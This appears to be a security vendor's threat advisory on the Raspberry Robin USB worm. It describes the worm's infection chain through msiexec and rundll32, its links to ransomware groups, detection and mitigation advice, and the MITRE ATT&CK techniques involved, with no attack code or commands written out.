Get in Touch
Initially seen in technology and manufacturing organisations, the worm has now spread through government agencies and telecommunication entities in Latin America, Australia and Europe.
Severity level: High – Exploitation is likely to lead to further malicious activity, with human operated ransomware and other types of malware being observed.
Raspberry Robin was initially seen spreading via infected external drives but Microsoft is now aware of at least four confirmed Raspberry Robin entry vectors.
The malware uses Windows Installer to communicate with compromised QNAP-associated domains to download and install malicious DLL files to the infected device.
The USB payload behaviour follows five distinct steps:
1. Infected external device attached to victim’s computer
2. Cmd.exe reads and executes malicious file then launches msiexec.exe that reaches out to malicious URL
3. Malicious DLL installed from the previously connected URL
4. Rundll32.exe launches legitimate Windows utility to execute malicious DLL
5. Outbound connections attempted, usually to TOR networks.
Researchers at Avast have documented a heavily obfuscated DLL backdoor used by Raspberry Robin, which they’ve named Roshtyak.
Depending on the network’s settings, an infected USB drive may autorun the malware or trick a user into manual execution.
Successful execution can result in the compromise of the system. This may lead to further attacks and the loss of sensitive data.
Microsoft has been closely tracking Raspberry Robin activity and current builds of Microsoft Defender can alert users to exploitation by flagging at stage 3 of the attack chain.
Logs may also be searched for unexpected msiexec.exe activity and DLL downloads/connections.
Containment, Mitigations & Remediations
It is strongly recommended that customers have an effective endpoint detection & response (EDR) solution in place to help protect against this type of attack.
Untrained users should not investigate unknown external media devices. Aside from the possibility of malicious files or exploit code, one well-known attack is for the USB device to present to the host operating system as a keyboard and start typing malicious commands. This can present issues for investigators.
Microsoft reports that their attack surface reduction rules have been successful in mitigating the attack in the early stages
Indicators of Compromise
Raspberry Robin reported hash values:
Raspberry Robin associated IPs:
Raspberry Robin has been spreading since its initial discovery at the tail end of 2021. Initially spreading relatively slowly, it is now one of the largest malware distribution platforms currently active. Microsoft reports that nearly 3,000 devices in almost 1,000 organisations have seen at least one Raspberry Robin payload-related alert in October 2022.
Infection by Raspberry Robin has at different times led to deployment of IcedID, Bumblebee and TrueBot payloads indicating they may be providing initial access to a number of other threat actors.
In July 2022 Microsoft reported FakeUpdates (SocGholish) malware being delivered via existing Raspberry Robin infections leading to DEV-0243 activity (EvilCorp).
In October 2022, Microsoft researchers observed Raspberry Robin infections followed by Cobalt Strike activity from DEV-0950 (FIN11/TA505) leading to deployment of Clop ransomware.
T1036 – Masquerading
T1091– Replication Through Removable Media
T1059.003 – Command and Scripting Interpreter: Windows Command Shell
T1548.002 – Abuse Elevation Control Mechanism: Bypass User Account Control
T1218.011 – System Binary Proxy Execution: Rundll32
T1218.008 – System Binary Proxy Execution: Odbcconf
T1218.007 – System Binary Proxy Execution: Msiexec
T1218.010– System Binary Proxy Execution: Regsver32
T1574.002 – Hijack Execution Flow: DLL Side-Loading
T1071.001 – Application Layer Protocol: Web Protocols
T1105 – Ingress Tool Transfer